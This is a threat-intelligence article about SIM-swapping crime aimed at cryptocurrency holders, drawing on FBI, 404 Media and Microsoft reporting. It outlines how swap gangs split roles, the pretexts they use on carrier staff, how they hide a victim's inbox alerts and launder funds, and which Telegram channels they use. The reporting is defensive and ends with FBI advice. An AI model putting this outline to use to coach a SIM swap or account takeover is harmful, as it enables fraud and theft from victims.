Cryptosec Maps Dark Web SIM Swapping Economy

In the U.S. alone, SIM-swapping attacks resulted in $72 million worth of losses last year, four-million dollars more than 2021, according to the Federal Bureau of Investigation. In a 2022 public service announcement, the FBI defined SIM swapping as a “malicious technique where criminal actors target mobile carriers to gain access to victims’ bank accounts, virtual currency accounts, and other sensitive information.”

The PSA noted that threat actors “primarily conduct SIM swap schemes using social engineering, insider threat, or phishing techniques.” Threat actors execute their SIM swap attacks via social-engineering ruses, where they impersonate authorized mobile-carrier account holders and dupe customer service representatives into “switching the victim’s mobile number to a SIM card in the criminal’s possession,” according to the PSA.

Even more troubling are insider-threat scenarios. In these cases, mobile carrier employees function as co-conspirators, facilitating thieves’ access to the customer accounts they are targeting in exchange for the cut of the action. These malicious insiders are often recruited on Dark Web cybercriminal forums and on Telegram.

Meanwhile, threat actors also direct phishing attacks on mobile-carrier employees. Attackers obtain employees’ contact details and send them emails or texts impersonating their trusted network of friends, business colleagues, or vendor relationships. These malicious communications are trip-wired with a malware payload that attackers use to “hack mobile carrier systems that carry out SIM swaps,” according to the FBI.

After attackers have successfully swapped their victims SIM card, they redirect all calls and texts and other data to their devices. This rerouting of communications enables attackers to send “Forgot Password’ or ‘Account Recovery’ requests to the victim’s email and other online accounts associated with the victim’s mobile telephone number,” notes the PSA.

From here, threat actors exploit their newfound control over victims’ two-factor authentication (2FA) portals to take over financial and other accounts of interest, resetting account login credentials to lock authorized users out of the online services they use. Over the last few years, cryptocurrency investors have been hyper-targeted by SIM swap attackers.

A recent Forbes article  describes one such case where Bart Stephens, a cofounder and managing founder of crypto fund Blockchain Capital, fell victim to a SIM-swapping attack that resulted in the theft of “$6.3 million of bitcoin, ether and other cryptocurrencies from his digital wallets.” Stephens has filed a lawsuit against the SIM swapper, who is only identified as “Jane Doe” in the court filing, in an effort to recover his stolen digital assets.

The Dark Web & Telegram are Staging Points for SIM Swap Heists

Stephens’s lawsuit, filed in Northern District of California this past August, alleges that the attacker “used personal information available online and on the dark web to bypass security checks with his cellular network provider and change account passwords in May,” per Forbes reporting. After taking over his mobile-carrier account, the attacker ordered a new cell phone and “ported Stephen’s private cell number to a SIM in the new device,” Forbes wrote.

In the Dark Web forum posts below, two threat actors target Coinbase customers specifically.

This crime is becoming increasingly more accessible to young amateurs, as some threat actors even publish and productize full-fledged SIM swapping guides on the Dark Web and Telegram. 

Stephens’s lawsuit highlights the prominence of the underground cybercriminal ecosystem as a staging point for the commission of SIM swapping crimes. A recent article published in 404 Media explains how this ecosystem works by spotlighting the digital exploits of ACG, “a group of alleged hackers who the FBI says are responsible for a wave of Bitcoin thefts and other crimes,” according to the story.

ACG, which counts around six members, “are a 21st century version of bank robbers. Instead of a gang lifting physical cash from a vault, these opportunists work together to quickly take over a target’s phone number, intercept their login codes, then pilfer any cryptocurrency they own before the victim has much of a chance to react at all,” according to the 404 Media story.

As the story notes, ACG is a subset of “The Comm,” a “nebulous network” that includes thousands of “hackers, gamers, and young girls” who correspond across roughly 100 Telegram channels and Discord servers, most of which are fraud focused. Most members of this ecosystem are older teenagers and early 20somethings.

More experienced cybercriminal members of the Comm also network on the Dark Web, selling access or recruiting team members and money mules on hacker forums like XSS, Exploit, Russian Anonymous Marketplace (RAMP), Breach Forums, and Dread.

But accomplished cybercriminals can also be found coordinating SIM swap attacks and conducting other illegal business in some of the Comm’s more prolific fraud-oriented Telegram groups. Cryptosec learned from cybercriminal sources that some of the Comm’s favored community resources for SIM swapping include the following Telegram channels: Sim Swamp, Sim Kitties, Omerta, Star Fraud, and others.

The above are Telegram groups where experienced and budding SIM swappers, and other cybercriminals network, looking for new scams and other cybercriminals to partner with.

When it comes to SIM swapping, the theme of partnership is key to understanding this attack typology. More lucrative heists are rarely the work of lone wolves. As the 404 Media story analogized, “Everyone in a bank job has a specific role. A SIM swapping gang is no different.”

Anatomy of Heist

These thefts begin with a “Searcher, who breaks into a person’s email account, perhaps by using software to churn through a mass of potential passwords or buying the login credentials from another hacker,” according to a 404 Media reporting. Logs are increasingly being obtained by initial access brokers (IABs) on the Dark Web who acquire these credentials via the mass-infection of devices with information stealers (info- stealers).  

A recent research report authored by Israeli threat intelligence company Hudson Rock noted that info-stealers acquire the following data from infected devices:

• Credentials: Info-stealers collect login links, usernames, and passwords stored in browsers like Google Chrome.

• Cookies

• Documents and text files: Info-stealers know to discover and target high-risk ones with financial information, corporate data, secret keys, 2FA backup codes, server passwords, crypto private keys, etc.

• Machine-specific properties

More advanced versions of these trojans are capable of bypassing latest-edition anti-virus (AV) software, according to Hudson Rock research. People typically become infected with info-stealers after downloading pirated software that is laced with the trojan, according to Hudson Rock. One info-stealer that is particularly popular among the cybercriminal elite is Raccoon.

On August 14, following a six-month absence, the developers of this info-stealer announced the release of the Raccoon version 2.3.0 across multiple cybercriminal forums.

In the post below, threat actor ‘churk’ solicits access to logs for American Coinbase and Kraken customers.

Other Searchers, like the Canadian scammer ‘Yahya,’ who was recently exposed by blockchain investigator ZachXBT, apparently had access to a compromised Twitter (now X) admin panel that allowed him to micro-target users who were more likely to possess large sums of crypto.

Once Searchers compromise a victim’s account, they scour the inbox, looking for indicators that their target owns significant amounts of crypto, per the 404 Media report. Some markers that Searchers look out for include emails displaying the victim’s Bitcoin balance, a receipt from when the person previously liquidated their crypto, or “anything that would signal this target is worth pushing to the next step,” according to the 404 Media report. 

“Once the Searcher gets a hit, they prepare to cover the gang’s tracks. They configure the inbox to hide incoming emails from the target’s Bitcoin exchange,” noted the 404 Media story. This step is analogous to knocking out the security cameras.

Searchers take this measure to set the stage for the next phases of the heist when their co-conspirators swap the target’s SIM and access the victim’s crypto account. Now, if the crypto exchange detects an unusual login or transaction activity, all correspondence will be hidden from the victim.

In the next phase of the attack, the social engineering ruse, the “Caller steps in,” noted 404 Media. “This person is the sweetalker, the one who is going to trick the bank employees to let them into the vault,” according to 404 Media. In this case, the vault is the victim’s mobile carrier account. Meanwhile the mark, or the immediate target of the social engineering attack, is the telecom provider’s customer support representative.

The Caller impersonates the crypto-account holder they are targeting and feign a variety of different scenarios. Some common ruses noted by the 404 Media report include: “I’ve lost my phone” or “I need to transfer my number to a new one.” Of course, these sweet talkers are often armed with a war chest of personally identifying information (PII) about their target like their birthdate, address, social security number, and more. This enhanced level of preparation makes social engineering attacks that much more convincing.

Once the Caller dupes the telecom provider’s customer service rep into porting the number to one in the gang’s control, the SIM swap is complete. Now, the actual crypto heist begins, as the “Holder,” or the gang member who actually has control over the SIM-swapped phone, receives the 2FA codes from the exchange, according to 404 Media.    

“The Holder then relays those codes back to the Searcher, who has since moved on to a more aggressive role. They finally enter the target’s cryptocurrency accounts, and start filling their duffel bags” with crypto, noted 404 Media. The Searcher transfers crypto from the victim’s exchange account to wallets the gang controls, while the Holder continues to relay 2FA authorization codes back to them from the SIM-swapped phone.

From there, more sophisticated SIM-swap gangs can launder their funds through a variety of methods, including mixing (blending), chain-hopping across different cryptocurrencies, and chain-peeling their scores across a long and labyrinthine series of smaller transactions. However, some ACG members and many other threat actors are apparently lacking in operational security (OpSec).

As Joseph Cox, the author of the 404 Media article noted in the comments section of his story, “It’s so funny that even with a bunch of bitcoin tracing tools available, they don’t even come up in the court records. Who needs them when hackers are using phones in their own names.”

Takeaways

As the 404 Media illustrated, modern, high-stakes SIM-swapping is increasingly taking the form of an organized conspiracy, with multiple threat actors operating as a gang to perform their frauds. The Dark Web and Telegram offer individual SIM swappers and organized SIM swap gangs a plethora of resources to recruit co-conspirators and target victims.

The most concerning aspect of this attack typology is the prevalence of malicious telecom insiders who are willfully complicit in the illegal transfer of authorized mobile accounts to bad actors. The aggressive resurgence of SIM swapping also illustrates the rise of a new generation of cybercriminals and fraudsters, predominantly in the West, who are loosely networked via the underground Comm ecosystem.

Comm-nexus threat actors, which Microsoft has dubbed “Octo Tempest,” were even reportedly involved in the multi-decamillion-dollar ransomware attacks that struck Caesars Entertainment and MGM Resorts International. Cybersecurity company Morphisec believes that Octo Tempest threat actors initiated their ransomware attack against MGM by first phishing an admin employee via SMS messaging.

This initial compromise enabled Octo Tempest to SIM swap the admin, which allowed them to gain access to MGM’s cloud environment and deploy a strain of ALPHV ransomware. As Microsoft noted in a recent research report, the group became an ALPHV affiliate in June. Microsoft said ALPHV’s acceptance of Octo Tempest is “notable in that, historically, Eastern European ransomware groups refused to do business with native English-speaking criminals.”

Microsoft said that “Octo Tempest leverages broad social engineering campaigns to compromise organizations across the globe with the goal of financial extortion.” Research into this group, which “overlaps with research associated with 0ktapus, Scattered Spider, and UNC3944, was initially seen in early 2022, targeting mobile telecommunications and business process outsourcing organizations to initiate” SIM swaps, according to Microsoft.

Initially, Microsoft said that Octo Tempest monetized their intrusions by “selling SIM swaps to other criminals and performing account takeovers of high-net-worth individuals to steal their cryptocurrency.” However, this group has evolved from basic SIM swap attacks to staging $15-million-and-up ransomware heists against major gaming companies. The group has thus emerged as “one of the most dangerous financial criminal groups,” cautions Microsoft.

The rise of Octo Tempest illustrates that SIM swap threat actors are becoming increasingly more sophisticated. To protect themselves from SIM swappers, digital-asset investors and users should do the following according to the 2022 FBI advisory:

• Do not advertise information about cryptocurrency assets on social media or forums.

• Do not provide your mobile number account information over the phone to representatives that request your account password or pin.

• Avoid posting personal information online, such as mobile phone number, address, or other PII.

• Use a variation of unique passwords to access online accounts.

• Monitor changes in SMS-based connectivity.

• Use strong multi-factor authentication methods such as biometrics, physical security tokens, or standalone authentication applications to access online accounts.

• Do not store passwords, usernames, or other information for easy login on mobile device applications.

Beyond these FBI tips, crypto users should also work with a threat intelligence vendor to rapidly identify the leakage of their PII and login credentials on the Dark Web and mitigate the risk of account compromise.